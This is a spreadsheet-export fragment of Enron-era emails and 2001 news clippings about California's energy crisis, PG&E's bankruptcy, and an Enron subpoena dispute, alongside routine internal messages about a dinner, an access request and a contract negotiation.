with the utilities and be paid the millions they are owed._x000D_
_x000D_
??Bloom contends that the new rate plan will force some producers to operate _x000D_
at_x000D_
a loss because it does not adequately compensate for their gas expenses. He _x000D_
said_x000D_
he expects generators to challenge the plan in court or before the Federal_x000D_
Energy Regulatory Commission._x000D_
_x000D_
??Smutny-Jones contends that the plan wrongly assumes that all natural gas _x000D_
used_x000D_
by his members can be piped in from the Oregon border, where the price of_x000D_
natural gas is cheaper. The producers, he added, are seeking assurances that_x000D_
they will be paid realistic rates by the utilities for future deliveries._x000D_
_x000D_
??Utilities are scheduled to pay the first round of reduced rates, as ordered_x000D_
by the PUC, early next week. Both utilities have indicated that they plan to_x000D_
make the first round of payments._x000D_
_x000D_
??Edison officials said Friday they have been served with 10 producer _x000D_
lawsuits._x000D_
They say they fear that if the generators are let out of their contracts, they_x000D_
could sell their supplies out of state, which could in turn cause rates to _x000D_
rise_x000D_
for California consumers because it would reduce supply._x000D_
_x000D_
??PG&amp;E spokesman John Nelson said in an interview last week before the_x000D_
bankruptcy filing that PG&amp;E has been served with two such lawsuits. He said _x000D_
his_x000D_
company is also concerned about the PUC rate plan and whether it truly lowered_x000D_
the rates PG&amp;E must pay the alternative producers and whether there would be_x000D_
enough money in the rates paid by customers to turn around and pay the_x000D_
producers._x000D_
_x000D_
??"We're concerned that the commission decision does not solve the problem,"_x000D_
Nelson said._x000D_
_x000D_
??A Davis spokesman said last week that the administration is still working on_x000D_
the issue of money owed to the producers and that the administration is_x000D_
continuing to work with the PUC to get more generators back online._x000D_
_x000D_
??Observers believe the number of producer lawsuits will grow because most_x000D_
cases to date have been aimed at Edison. The utility has not paid its _x000D_
producers_x000D_
since November and has fought to have its rates slashed._x000D_
_x000D_
??By comparison, PG&amp;E has made efforts to partially pay its producers in _x000D_
recent_x000D_
months and to keep them informed of their financial situation._x000D_
_x000D_
??A Bankruptcy Court is expected to decide whether to affirm the contracts of_x000D_
producers who sell to PG&amp;E or to free them to sell their power elsewhere._x000D_
_x000D_
??An Imperial County judge has already freed CalEnergy, a small geothermal_x000D_
producer, from its contract with Edison because of Edison's failure to pay the_x000D_
company. The court has delayed ruling on CalEnergy's request for $ 99 million _x000D_
in_x000D_
back payments until April 16--the day the utility is expected to begin paying_x000D_
its alternative generators._x000D_
_x000D_
??Since it quit transmitting 270 megawatts to Edison last month, CalEnergy has_x000D_
been selling its electricity to El Paso Energy, a marketing company that _x000D_
resells_x000D_
power on the spot market. If other generators are able to repeat the pattern, _x000D_
it_x000D_
could further reduce state energy supplies, particularly this summer, when _x000D_
every_x000D_
megawatt will be needed to avoid blackouts._x000D_
_x000D_
LOAD-DATE: April 9, 2001_x000D_
_x000D_
???????????????????????????????2 of 4 DOCUMENTS_x000D_
_x000D_
??????????????????Copyright 2001 The New York Times Company_x000D_
_x000D_
??????????????????????????????The New York Times_x000D_
_x000D_
????????????????April 7, 2001, Saturday, Late Edition - Final_x000D_
_x000D_
SECTION: Section A; Page 1; Column 4; National Desk_x000D_
_x000D_
LENGTH: 1174 words_x000D_
_x000D_
HEADLINE: California's Largest Utility Files for Bankruptcy_x000D_
_x000D_
BYLINE: ?By LAURA M. HOLSON_x000D_
_x000D_
DATELINE: LOS ANGELES, April 6_x000D_
_x000D_
BODY:_x000D_
_x000D_
??The Pacific Gas and Electric Company, California's largest investor-owned_x000D_
utility, filed for bankruptcy protection today, declaring that politicians and_x000D_
regulators had not moved quickly enough to resolve an energy crisis that has_x000D_
caused periodic rolling blackouts and is costing the state billions of _x000D_
dollars._x000D_
_x000D_
??The filing, which seeks reorganization under Chapter 11 of the bankruptcy_x000D_
code, shifts decision-making about crucial aspects of the California energy_x000D_
debacle from officials in Sacramento, the state capital, to a federal _x000D_
bankruptcy_x000D_
court in San Francisco, where Pacific Gas and Electric has its headquarters._x000D_
_x000D_
???The utility hopes to have more success in court in trying to win relief _x000D_
from_x000D_
$9 billion in wholesale energy debt it says it has incurred since prices began_x000D_
soaring last May. Legislators and regulators have been loath to bail out _x000D_
Pacific_x000D_
Gas and Electric or the No. 2 utility, Southern California Edison, whose_x000D_
billions in debt to wholesalers and marketers stem from flawed state_x000D_
deregulation that did not allow the utilities to pass on rising costs to_x000D_
consumers._x000D_
_x000D_
??The filing came as a surprise to many, particularly Gov. Gray Davis, who in _x000D_
a_x000D_
televised speech only Thursday night reversed his stand against electricity _x000D_
rate_x000D_
increases, acknowledging that consumers would have to pay more._x000D_
_x000D_
??For months, the two utilities had complained that they were running out of_x000D_
cash and had demanded that rates be increased to cover their costs, but they _x000D_
had_x000D_
not made good on any threat to file for bankruptcy. The reason, in part, was_x000D_
that the governor's office, in trying to forestall a greater sense of_x000D_
uncertainty surrounding the energy crisis, was negotiating to keep the _x000D_
utilities_x000D_
solvent by buying their transmission lines._x000D_
_x000D_
??On Tuesday, executives from Pacific Gas and Electric met for four hours with_x000D_
the governor's negotiators. On Thursday, Wall Street analysts said they had _x000D_
been_x000D_
told by the governor's representatives that there were hopes some resolution_x000D_
could be reached. That night the governor proposed a plan, with rate _x000D_
increases a_x000D_
centerpiece, that he said would help pay off the utilities' debts._x000D_
_x000D_
??In the end, none of this was enough for Pacific Gas and Electric. In a_x000D_
conference call with reporters today, Robert D. Glynn Jr., chairman of the_x000D_
utility and of its parent company, the PG&amp;E Corporation, said the governor was_x000D_
not moving fast enough, having delayed a face-to-face meeting for weeks._x000D_
_x000D_
??"We've heard a lot of the words that have been involved, but we have not _x000D_
seen_x000D_
a lot of actions," Mr. Glynn said. "The regulatory and political processes _x000D_
have_x000D_
failed us, and now we are turning to the court."_x000D_
_x000D_
??Mr. Glynn said the bankruptcy filing would not affect customer service. And,_x000D_
he said, it involves only Pacific Gas and Electric, which operates in Northern_x000D_
and Central California, and not the parent company itself or its other units._x000D_
_x000D_
??Southern California Edison, meanwhile, said today that it would continue to_x000D_
try to reach an agreement with the governor._x000D_
_x000D_
??Responding to the announcement by Pacific Gas and Electric, Governor Davis_x000D_
said the company had "dishonored itself."_x000D_
_x000D_
??"This action was unnecessary," he said. "They've caused undue alarm. PG&amp;E _x000D_
was_x000D_
not pushed into bankruptcy, but plunged themselves into bankruptcy for their _x000D_
own_x000D_
strategic advantage -- not the best interests of the people of California."_x000D_
_x000D_
??A few months ago, in a move widely criticized by consumer groups and_x000D_
legislators, the PG&amp;E Corporation took steps to ensure that the assets of its_x000D_
other subsidiaries would not be seized in case of a Pacific Gas bankruptcy. _x000D_
Just_x000D_
this week the State Public Utilities Commission said it would investigate_x000D_
whether Pacific Gas and Electric, Southern California Edison and the state's _x000D_
No._x000D_
3 investor-owned utility, San Diego Gas and Electric, had engaged in any_x000D_
financial misconduct by funneling billions to their parent companies to pay_x000D_
dividends and repurchase stock._x000D_
_x000D_
??Trading in PG&amp;E stock was halted briefly today. When it resumed, the price_x000D_
quickly fell by nearly 40 percent. By day's end, the stock of Edison_x000D_
International, parent of Southern California Edison, had also dropped sharply,_x000D_
by 35 percent._x000D_
_x000D_
??That Pacific Gas and Electric, which helped design the deregulation that_x000D_
brought on the California power crisis, would now take so drastic a step both_x000D_
concerned and puzzled analysts. "It doesn't make sense, because the governor_x000D_
endorsed the rate increase the utilities had been asking for," said Susan_x000D_
Abbott, head of the power group at Moody's Investors Service in New York._x000D_
_x000D_
??But Ms. Abbott also noted that the rate increases -- varying from 10 percent_x000D_
to 37 percent, on top of a 9 percent surcharge adopted by the state this _x000D_
winter_x000D_
-- would not entirely eliminate the debt accumulated by the utilities as a_x000D_
result of deregulation. "There were a lot of people who said, 'Great, the_x000D_
utilities' problems are over,' " she said. "But they are not."_x000D_
_x000D_
??The bankruptcy petition filed by Pacific Gas and Electric reported assets of_x000D_
$24 billion and debts of $18 billion. In his talk with reporters, Mr. Glynn _x000D_
said_x000D_
the company was still incurring $300 million in monthly wholesale energy costs_x000D_
that it had no way of paying. But his biggest concern, aside from the stalled_x000D_
negotiations with the governor, is the Public Utilities Commission._x000D_
_x000D_
??For instance, Mr. Glynn complained about the commission's recent change to_x000D_
the utilities' accounting practices, a step he said would make it even more_x000D_
difficult for Pacific Gas to recoup any losses. The commission has also said _x000D_
it_x000D_
is the state, which has had to step in as a middleman buying power for the_x000D_
utilities because many suppliers have cut off their credit, that will be the_x000D_
first to be paid money flowing from the rise in consumer rates._x000D_
_x000D_
??In any event, moving into the bankruptcy court the debate over debt that has_x000D_
already been incurred should resolve a question that the parties to the issue_x000D_
have been unable to settle: who indeed will get paid first? Analysts say the_x000D_
bankruptcy judge, Dennis Montali, will have to consider several issues, in_x000D_
particular that electricity is a vital necessity._x000D_
_x000D_
??That being the case, it is likely that the power generators, which have been_x000D_
called price gougers and pirates but have supplied the state with enough _x000D_
energy_x000D_
to keep the lights on, will have priority among the creditors. That is good _x000D_
news_x000D_
for many of the state's smaller generators, many of which were forced to shut_x000D_
their doors when Pacific Gas and Electric made only partial payments to them._x000D_
After that, analysts say, bondholders will most likely be next in line, _x000D_
although_x000D_
all this will await a judgment by the court, which among other things must _x000D_
also_x000D_
decide what priority the state enjoys._x000D_
_x000D_
??"It's going to help focus in a very specific, objective order the manner in_x000D_
which their financial situation gets sorted out," said Jan Smutny-Jones, _x000D_
executive director of the Independent Energy Producers Association, which_x000D_
represents power generators in the state. "The thing to do when you get in a_x000D_
hole is stop digging. They did that today."_x000D_
_x000D_
_x000D_
??http://www.nytimes.com_x000D_
 _x000D_
GRAPHIC: Photo: A Pacific Gas and Electric crew at work yesterday on power _x000D_
lines_x000D_
in San Francisco. The company has filed for federal bankruptcy protection._x000D_
(Associated Press)(pg. A10)_x000D_
_x000D_
LOAD-DATE: April 7, 2001_x000D_
_x000D_
???????????????????????????????3 of 4 DOCUMENTS_x000D_
_x000D_
??????????????????Copyright 2001 McClatchy Newspapers, Inc._x000D_
_x000D_
????????????????????????????????Sacramento Bee_x000D_
_x000D_
?????????????????April 7, 2001, Saturday METRO FINAL EDITION_x000D_
_x000D_
SECTION: MAIN NEWS; Pg. A23; POWER CRUNCH_x000D_
_x000D_
LENGTH: 507 words_x000D_
_x000D_
HEADLINE: Natural gas project OK'd_x000D_
_x000D_
BYLINE: David Whitney Bee Washington Bureau and Carrie Peyton Bee Staff Writer_x000D_
_x000D_
DATELINE: WASHINGTON_x000D_
_x000D_
BODY:_x000D_
_x000D_
??The Federal Energy Regulatory Commission gave quick approval Friday to a_x000D_
project that will increase natural gas deliveries for electric power _x000D_
generation_x000D_
in California this summer._x000D_
_x000D_
??And in a move that intensified the conflict over who should pay for_x000D_
California's emergency power needs, FERC also ruled that the state grid _x000D_
operator_x000D_
must find "creditworthy" buyers for all power it procures. The decision could_x000D_
either drive up electricity prices by removing a state negotiating tool or_x000D_
increase the risk of rolling blackouts, or both._x000D_
_x000D_
??The action to approve a project from the Williams Cos. comes just three _x000D_
weeks_x000D_
after the firm applied for a certificate to add compression stations and other_x000D_
equipment along its Kern River Transmission Co. line from Wyoming to_x000D_
Bakersfield._x000D_
_x000D_
??With the new stations and equipment, said Williams spokeswoman Beverly_x000D_
Chipman, the company will be able to deliver an additional 135 million cubic_x000D_
feet of natural gas into California - enough to generate power for 750,000_x000D_
homes, she said._x000D_
_x000D_
??Chipman said that ordinarily it takes six months to a year to move an_x000D_
application through FERC. This one sailed through in record time at the _x000D_
urgings_x000D_
of the governors of California, Nevada, Utah and Wyoming, she said._x000D_
_x000D_
??The $81 million project will include new compression stations in Utah and_x000D_
California and the upgrading of compressors units in Wyoming, Utah and Nevada._x000D_
_x000D_
??"We are prepared to do whatever we can to rush supplies to West Coast_x000D_
markets," said FERC chairman Curl Hebert Jr._x000D_
_x000D_
??FERC's decision on power sales affects the state Independent System _x000D_
Operator,_x000D_
which operates the electrical grid. For weeks, the state Department of Water_x000D_
Resources has been opting to buy less power than California needs when it _x000D_
feels_x000D_
prices are too high. The rest - sometimes 1,000 to 2,000 megawatts per hour -_x000D_
has been bought by the ISO, which operates from Folsom._x000D_
_x000D_
??PG&amp;E estimated Friday that the ISO purchases have added about $300 million a_x000D_
month to its debts. Power sellers, afraid the ISO would not be paid by PG&amp;E or_x000D_
Southern California Edison, asked federal regulators to force the ISO to find _x000D_
a_x000D_
creditworthy buyer or stop compelling sales._x000D_
_x000D_
??FERC had ruled on the issue in February, and on Friday it reinforced that_x000D_
ruling, saying the ISO misinterpreted its earlier decision and must comply._x000D_
_x000D_
??The ruling could increase pressure to find "creative" solutions to who will_x000D_
pay for California's power, said Jan Smutny-Jones, head of the Independent_x000D_
Energy Producers Association. "Obviously the ISO doesn't have the money and _x000D_
the_x000D_
utilities don't have the money either. The question is, where do we go from_x000D_
here," he said. "My hope is that it does not make blackouts more likely."_x000D_
_x000D_
??The state hasn't decided whether it will appeal the decision, said Roger_x000D_
Salazar, a spokesman for Gov. Gray Davis. But he said the federal ruling _x000D_
appears_x000D_
to make it likely that California will have to buy more electricity on the_x000D_
utilities' behalf._x000D_
_x000D_
??The Bee's David Whitney can be reached at (202) 383-0004 or_x000D_
dwhitney@mcclatchydc.com._x000D_
_x000D_
LOAD-DATE: April 8, 2001_x000D_
_x000D_
???????????????????????????????4 of 4 DOCUMENTS_x000D_
_x000D_
??????????????Copyright 2001 Knight Ridder/Tribune News Service_x000D_
???????????????????????Knight Ridder/Tribune News Service_x000D_
_x000D_
????????????????????????????San Jose Mercury News_x000D_
_x000D_
???????????????????????????April 7, 2001, Saturday_x000D_
_x000D_
SECTION: STATE AND REGIONAL NEWS_x000D_
_x000D_
KR-ACC-NO: ?K3364_x000D_
_x000D_
LENGTH: 1209 words_x000D_
_x000D_
HEADLINE: Filing for Chapter 11 may help PG&amp;E's debt but it won't solve power_x000D_
crisis_x000D_
_x000D_
BYLINE: By Brandon Bailey_x000D_
_x000D_
BODY:_x000D_
_x000D_
??SAN JOSE, Calif. _ Filing for bankruptcy protection may help PG&amp;E with its_x000D_
debts, but it won't solve the state's power crunch._x000D_
_x000D_
??Power suppliers promised Friday that they will continue to deliver_x000D_
electricity for California consumers, which means the lights will stay on for_x000D_
now. But experts and industry spokesmen say that supply won't be enough to_x000D_
prevent the shortages and rolling blackouts that state officials have _x000D_
predicted_x000D_
for this spring and summer._x000D_
_x000D_
??"The summer crisis will still happen," said Bill Highlander of Calpine _x000D_
Corp.,_x000D_
a San Jose-based energy producer. "It's a matter of supply and demand."_x000D_
_x000D_
??In addition, many experts agreed Friday that Pacific Gas &amp; Electric Co.'s_x000D_
bankruptcy filing could have little immediate impact on other problems that _x000D_
are_x000D_
plaguing the state's power system: soaring wholesale prices, congested_x000D_
transmission lines and aging generating plants._x000D_
_x000D_
??But some said the action eventually could lead to more rate increases for_x000D_
consumers, beyond those proposed by Gov. Gray Davis and the state Public_x000D_
Utilities Commission in recent weeks._x000D_
_x000D_
??The reason lies in the fact that a bankrupty judge doesn't have a magic _x000D_
wand._x000D_
_x000D_
??The court can make sure suppliers fulfill their existing contracts by_x000D_
guaranteeing that they will be paid for future deliveries, placing them ahead _x000D_
of_x000D_
creditors who are only seeking payment for past debts. A judge may be able to_x000D_
order PG&amp;E's customers to pay higher rates _ or at least the court can put_x000D_
pressure on state regulators to authorize rate hikes._x000D_
_x000D_
??But a judge can't order PG&amp;E's suppliers to build new power plants or speed_x000D_
up expansion of existing generators. Analysts also said they don't believe a_x000D_
judge has the authority to limit wholesale prices on the spot market, where _x000D_
much_x000D_
of the state's energy is still bought and sold._x000D_
_x000D_
??PG&amp;E has said it's been unable to pay its suppliers because it has a_x000D_
multibillion-dollar deficit from buying power at wholesale prices that the _x000D_
state_x000D_
won't allow it to pass on to consumers. Instead, the state of California has_x000D_
been buying power for PG&amp;E and Southern California Edison while attempting to_x000D_
negotiate a bailout for both utilities._x000D_
_x000D_
??Some industry spokesmen expressed hope that the bankruptcy filing would give_x000D_
PG&amp;E suppliers more assurance about getting paid in the future _ and prevent _x000D_
the_x000D_
state's energy markets from careening further out of control._x000D_
_x000D_
??Still, other analysts warned that if the filing delays payment to smaller_x000D_
power generators, who provide up to a third of the state's supply, it could_x000D_
drive more of them out of the market._x000D_
_x000D_
??"I just don't see any upside to this at all," said Peter Navarro, a _x000D_
professor_x000D_
of economics and public policy at University of California-Irvine, who has_x000D_
closely followed the effects of deregulation on the state's energy industry._x000D_
_x000D_
??Spokesmen for some of the state's largest generators, including Calpine, _x000D_
Duke_x000D_
Energy and Dynegy Inc., said PG&amp;E's action would have no effect on their_x000D_
operations._x000D_
_x000D_
??"It really shouldn't have any effect on our putting output into the grid,"_x000D_
said Tom Williams of Duke Energy, which owns three power plants in Northern_x000D_
California._x000D_
_x000D_
??In large part, that is because these companies have not been selling _x000D_
directly_x000D_
to PG&amp;E for several months. Since the utility began developing financial_x000D_
problems last fall, several major suppliers said they have been negotiating_x000D_
contracts with other buyers. Dynegy, for example, has committed its output in_x000D_
contracts with the state of California. Duke has agreements with other _x000D_
wholesale_x000D_
energy buyers and traders._x000D_
_x000D_
??If the bankruptcy filing allows PG&amp;E to reorganize its debts and eventually_x000D_
re-enter the energy market on a more stable footing, Steve Stengel of Dynegy_x000D_
said, "today's action could actually be a catalyst to moving forward toward a_x000D_
long-term solution."_x000D_
_x000D_
??But a number of small generators have already shut down their plants because_x000D_
PG&amp;E and Southern California Edison, the state's other major utility, haven't_x000D_
paid for past deliveries. That has kept about 3,000 megawatts off-line and_x000D_
contributed to shortages that caused the state's Independent System Operator _x000D_
to_x000D_
declare power alerts on several days last month._x000D_
_x000D_
??As the weather gets warmer, the Independent System Operator has warned that_x000D_
shortages will get worse. And the prospects for bringing those small _x000D_
generators_x000D_
back online are uncertain._x000D_
_x000D_
??Some of those small producers have said they may have to file for bankruptcy_x000D_
protection themselves. One spokesman sa</t>
  </si>
  <si>
    <t>Wed, 21 Mar 2001 09:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Dinner Invitation - April 10, 2001 (For Trading Track)</t>
  </si>
  <si>
    <t xml:space="preserve">Ted,_x000D_
_x000D_
Please mark me down for the dinner on Apr 10_x000D_
_x000D_
Fletch_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Fletcher J Sturm/HOU/ECT on 03/21/2001 _x000D_
05:03 PM ---------------------------_x000D_
From: John J Lavorato/ENRON@enronXgate@enronXgate on 03/15/2001 05:41 PM_x000D_
Sent by: Kimberly Hillis/ENRON@enronXgate_x000D_
To: Louise Kitchen/HOU/ECT@ECT, Hunter S Shively/HOU/ECT@ECT, Phillip K _x000D_
Allen/HOU/ECT@ECT, Scott Neal/HOU/ECT@ECT, John Arnold/HOU/ECT@ECT, Thomas A _x000D_
Martin/HOU/ECT@ECT, Kevin M Presto/HOU/ECT@ECT, Mark Dana Davis/HOU/ECT@ECT, _x000D_
Fletcher J Sturm/HOU/ECT@ECT, Rogers Herndon/HOU/ECT@ect, Karen _x000D_
Buckley/ENRON@enronXgate, Chuck Ames/NA/Enron@Enron, Bilal _x000D_
Bajwa/NA/Enron@Enron, Russell Ballato/NA/Enron@Enron, Steve _x000D_
Gim/NA/Enron@Enron, Mog Heu/NA/Enron@Enron, Juan Padron/NA/Enron@Enron, Vladi _x000D_
Pimenov/NA/Enron@Enron, Denver Plachy/NA/Enron@Enron, Paul _x000D_
Schiavone/ENRON@enronXgate, Elizabeth Shim/Corp/Enron@ENRON, Matt _x000D_
Smith/NA/Enron@ENRON, Joseph Wagner/NA/Enron@Enron, Jason _x000D_
Wolfe/NA/Enron@ENRON, Virawan Yawapongsiri/NA/Enron@ENRON_x000D_
cc: Ted C Bland/ENRON@enronXgate _x000D_
Subject: Dinner Invitation - April 10, 2001 (For Trading Track)_x000D_
_x000D_
_x000D_
_x000D_
You are cordially invited to attend cocktails and dinner on April 10, 2001 at _x000D_
La Colombe d'Or restaurant located at 3410 Montrose Blvd (a map can be found _x000D_
at www.lacolombedor.com).  Cocktail hour will start at 7:00 pm with dinner to _x000D_
follow.  _x000D_
_x000D_
Please note:  this dinner is for the Trading Track Program._x000D_
_x000D_
Please RSVP to Ted Bland at extension 3-5275 before April 6, 2001._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Re: Additional Open Season Results</t>
  </si>
  <si>
    <t xml:space="preserve">Lorraine Lindberg_x000D_
11/17/2000 05:17 PM_x000D_
To: Steven Harris/ET&amp;S/Enron@ENRON, Kevin Hyatt, Lindy _x000D_
Donoho/ET&amp;S/Enron@ENRON, Jeffery Fawcett/ET&amp;S/Enron@ENRON, TK _x000D_
Lohman/ET&amp;S/Enron@ENRON, Michelle Lokay/ET&amp;S/Enron@Enron, Christine _x000D_
Stokes/ET&amp;S/Enron@ENRON_x000D_
cc: Ronald Matthews/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Open Season Results_x000D_
_x000D_
Attached are the results of the Open Season.  _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 15 Sep 2000 09:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Another contact</t>
  </si>
  <si>
    <t>Eric,_x000D_
_x000D_
This guy is a friend of mine and he said he'll put in some good words about _x000D_
EOL and especially the new product that we're going to launch.  His name is _x000D_
Chris McDonald at Southern  (678) 579-3298.  He runs the West gas trading at _x000D_
Southern._x000D_
_x000D_
Fletch</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 00:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'twanda.sweet@enron.com', 'linda.guinn@enron.com'})</t>
  </si>
  <si>
    <t>Request Submitted: Access Request for hugh.eichelman@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">Any idea who this is?_x000D_
----- Forwarded by Richard B Sanders/HOU/ECT on 01/08/2001 08:18 AM -----_x000D_
_x000D_
	ARSystem &lt;ARSystem@mailman.enron.com&gt;_x000D_
	01/08/2001 08:12 AM_x000D_
		 _x000D_
		 To: "richard.b.sanders@enron.com" &lt;richard.b.sanders@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Request Submitted: Access Request for hugh.eichelman@enron.com_x000D_
_x000D_
_x000D_
You have received this email because you are listed as an alternate data _x000D_
approver. Please click _x000D_
http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000012515&amp;Page=_x000D_
Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000012515_x000D_
Approver            : linda.r.guinn@enron.com_x000D_
Request Create Date : 1/8/01 8:12:00 AM_x000D_
Requested For       : hugh.eichelman@enron.com_x000D_
Resource Name       : Litigation Tracking Database Write_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 29 Aug 2001 18:14:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>Judge rejects Enron request to halt legislative subpoena</t>
  </si>
  <si>
    <t>How badly does this affect us?_x000D_
_x000D_
-----Original Message-----_x000D_
From: djcustomclips@djinteractive.com_x000D_
[mailto:djcustomclips@djinteractive.com]_x000D_
Sent: Wednesday, August 29, 2001 8:38 PM_x000D_
To: 168842@mailman.enron.com_x000D_
Subject: Rahil Jafry: Judge rejects Enron request to halt legislative_x000D_
subpoena_x000D_
_x000D_
_x000D_
Judge rejects Enron request to halt legislative subpoena_x000D_
By JENNIFER COLEMAN_x000D_
_x000D_
08/29/2001_x000D_
Associated Press Newswires_x000D_
Copyright 2001.  The Associated Press.  All Rights Reserved._x000D_
_x000D_
   SACRAMENTO (AP) - A Sacramento Superior Court judge rejected energy_x000D_
company Enron's request to quash a subpoena issued by a state Senate_x000D_
committee investigating possible price manipulation in California's_x000D_
energy market._x000D_
_x000D_
   Judge Charles Kobayashi denied two of Enron's three motions Wednesday_x000D_
in tentative rulings, saying the court had no right to interfere with a_x000D_
legislative subpoena._x000D_
   Enron sued the Senate Select Committee to Investigate Market_x000D_
Manipulation in July to stop the subpoena of its financial and_x000D_
electricity trading records. Among its objections were that only the_x000D_
Federal Energy Regulatory Commission has the authority to investigate_x000D_
wholesale markets._x000D_
_x000D_
   The committee has sought documents from six energy companies as they_x000D_
investigate last year's price spikes in the wholesale electricity_x000D_
market._x000D_
_x000D_
   In his tentative ruling on Enron's motion asking for a protective_x000D_
order, Kobayashi said he was "sympathetic to Enron's concern for_x000D_
safeguarding its trade secret information."_x000D_
_x000D_
   But he added that the court couldn't assume the committee would_x000D_
divulge the confidential documents and Enron's constitutional rights_x000D_
weren't "jeopardized by delivery of their secrets to the document_x000D_
depository."_x000D_
_x000D_
   On the other motion, to quash the subpoena, the judge found the_x000D_
committee did follow proper procedure when serving Enron officials._x000D_
_x000D_
   Attorneys for the committee and Enron will return to court Thursday_x000D_
on the tentative rulings. Kobayashi set a court date for Sept. 7 on the_x000D_
third motion, which is a request for an injunction of the committee's_x000D_
investigation and contempt proceedings._x000D_
_x000D_
   Enron officials didn't immediately return calls from The Associated_x000D_
Press seeking comment._x000D_
_x000D_
   Enron officials have said the company is prepared to turn over 25,000_x000D_
documents that were already in California, but that other documents the_x000D_
committee wants are in Texas and out of the panel's reach._x000D_
_x000D_
   The committee found Enron in contempt for not turning over the_x000D_
documents. A full report on the contempt finding has been sent to the_x000D_
full Senate, which has not voted on it. A contempt report on Reliant_x000D_
Energy has also been sent to the Senate._x000D_
_x000D_
   A contempt finding against Mirant Corp. was later reversed when the_x000D_
company opened a document depository in Sacramento for the committee's_x000D_
investigators._x000D_
_x000D_
   If the full Senate imposes sanctions against Reliant or Enron, it_x000D_
will be the first time since 1929, when the Senate voted to jail_x000D_
reluctant witnesses during a committee investigation of price fixing and_x000D_
price gouging allegations involving cement sales to the state._x000D_
_x000D_
_x000D_
_x000D_
Folder Name: Rahil Jafry_x000D_
Relevance Score on Scale of 100: 83_x000D_
_x000D_
_______________________________________________________________________x000D_
_x000D_
To review or revise your folder, visit http://www.djinteractive.com or contact Dow Jones Customer Service by e-mail at custom.news@bis.dowjones.com or by phone at 800-369-7466. (Outside the U.S. and Canada, call 609-452-1511 or contact your local sales representative.)_x000D_
_______________________________________________________________________x000D_
_x000D_
Copyright (c) 2001 Dow Jones &amp; Company, Inc. All Rights Reserved</t>
  </si>
  <si>
    <t>Mon, 29 Nov 1999 08:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'arnold.eisenstein@enron.com'})</t>
  </si>
  <si>
    <t>Re: Revised Comm Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Arnold,  Do you have a name and number of the Plains attorneys (or someone _x000D_
who has their number) so I can discuss the attached issues with them _x000D_
concering the Comm Agreement._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Gerald Nemec/HOU/ECT on 11/29/99 04:43 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Mark Courtney_x000D_
11/29/99 04:37 PM_x000D_
To: Gerald Nemec/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Revised Comm Agreement  _x000D_
_x000D_
I think you should talk to their attorney directly.  Relevant points are:_x000D_
_x000D_
1.  This is actually a 12 MW substation.  _x000D_
_x000D_
3.  The communications are for their use only and don't really effect us _x000D_
except they might want to interrupt us when it is down.  That would of course _x000D_
be unacceptable.  _x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Gerald Nemec                           11/29/99 01:04 PM_x000D_
	_x000D_
_x000D_
To: Mark Courtney/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Revised Comm Agreement  _x000D_
_x000D_
Three problems with this Draft._x000D_
_x000D_
1.  In Paragraph 1.1, they removed my requirement of installing a system to _x000D_
meet "all of Enron's electrical power requirements for the Driver".  My _x000D_
concern here is that they put in equipment that is not adequate to handle our _x000D_
load requirements.  At a minimum we should state a specific load requirement _x000D_
for this station.  E.g. 10,000 HP._x000D_
_x000D_
2.  In Paragraph 1.1, they inserted a requirement that Plain's approve any _x000D_
in-service date for the driver and that the Telecommunication Equipment would _x000D_
be in-service by such date.  My draft had a date established by Enron solely _x000D_
and Plains would have to meet such date.  I think we need control of our _x000D_
in-service date without Plains prior approval.  We will be reasonable in _x000D_
establishing such date._x000D_
_x000D_
3.  Plains disclaims all warranties with respect to the Telecommunication _x000D_
Equipment.  This was not in the first draft.  We need some assurance that _x000D_
this equipment will do the job we need it to._x000D_
_x000D_
I would be happy to discuss these directly with Plains' attorneys at their _x000D_
convenience._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark Courtney_x000D_
11/24/99 01:50 PM_x000D_
To: Gerald Nemec/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Revised Comm Agreement_x000D_
_x000D_
How does this look to you?_x000D_
_x000D_
Mark_x000D_
---------------------- Forwarded by Mark Courtney/HOU/ECT on 11/24/99 01:50 _x000D_
PM ---------------------------_x000D_
From: Arnold L Eisenstein@ENRON_DEVELOPMENT on 11/18/99 05:35 PM_x000D_
To: Mark Courtney@ECT, Mark Knippa@ECT, Gerald Nemec@ECT_x000D_
cc: Rich Plachy/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, James _x000D_
Pfeffer/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
Subject: Revised Comm Agreement_x000D_
_x000D_
just came in.   Rich and team will review concurrently with your review_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Arnold L Eisenstein/ENRON_DEVELOPMENT on _x000D_
11/18/99 05:36 PM ---------------------------_x000D_
_x000D_
_x000D_
Mark Conner &lt;mconner@plainsgt.org&gt; on 11/18/99 05:16:25 PM_x000D_
_x000D_
	_x000D_
To:	"'Rich Plachy - ENRON'" &lt;rplachy@ei.enron.com&gt;, Arnold L _x000D_
Eisenstein/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:	_x000D_
	_x000D_
Subject:	Revised Comm Agreement_x000D_
_x000D_
_x000D_
_x000D_
